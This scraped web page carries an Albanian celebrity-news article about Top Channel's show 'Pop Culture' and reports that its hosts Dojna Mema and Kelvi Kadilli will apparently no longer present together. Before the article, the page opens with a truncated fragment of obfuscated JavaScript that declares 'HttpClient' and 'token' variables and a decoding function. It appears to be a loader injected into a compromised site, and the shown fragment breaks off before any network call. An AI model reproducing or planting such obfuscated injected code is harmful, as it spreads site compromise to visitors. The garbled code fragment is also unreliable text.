;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Shtatori nuk i bën më bashkë Dojna Memën dhe Kelvi Kadillin?

By

Erdhën si risi e sezonit të kaluar me shumë zhurmë në Top Channel.

Dyshja, Kelvi Kadilli dhe Dojna Mema u bënë bashkë për një projekt të ri të titulluar ‘Pop Culture’, një version i avancuar i ‘Top Select’ që u mbyll pas gati 13 vitesh.

 

View this post on Instagram

 

E Hene | Ora 15:35 | #popculture ✌?

A post shared by Kelvi Kadilli (@kelvikadilli) on

Por, duket se ‘Pop Culture’ nuk e paska pasur të gjatë më shumë se një vit transmetim bashkë me Dojnën dhe Kelvin.

Pas një sezoni, me intervista që morrën relativisht vëmendje të madhe, Shtatori nuk do i risjellë më Dojnën dhe Kelvin bashkë në Top.

Sipas të gjitha gjasave, ‘Pop Culture’ do ndryshojë, në një kohë kur edhe në televizionet rivale, formatet që fokusohen në fytyra publike po ndërpriten, shkaku i një ‘mbidoze’ të emisioneve me VIP-a, të cilët bie fjala në TCH shpesh shfaqeshin të njejtit nga mëngjesi me ‘Wake UP’, pasditja me ‘Pop Culture’ e mbrëmja në ‘Top Show’.

Me Ben Blushin drejtor, është parë e arsyeshme që fashën e orarit të programit të Kelvit dhe Dojnës ta marrë një emision tematik interviste, promo e të cilit doli sot.

I kontaktuar nga Prive.al, Kelvi Kadilli nuk ka dashur të flasë tani për tani mbi zhvillimin por indirekt e konfirmoi mungesën e tij. Sipas gjasave, prezantuesi befasishëm s’do jetë më në televizionin të cilin e ka synuar që në rini. Më, Top Channel nuk figuron as në biografinë e prezantuesit kontravers.

Por, e kontaktuar, Dojna ka pasur përgjigje direkte duke konfirmuar vazhdimësinë e saj në program. ‘Jo, programi nuk është mbyllur, përkundrazi do vijë me shumë ndryshime dhe surpriza, një ndër to është edhe orari i transmetimit’ – ka deklaruar Mema.

Mbetet të shihet se ç’do ndodhë! /Prive.al

Artikuj të ngjashëm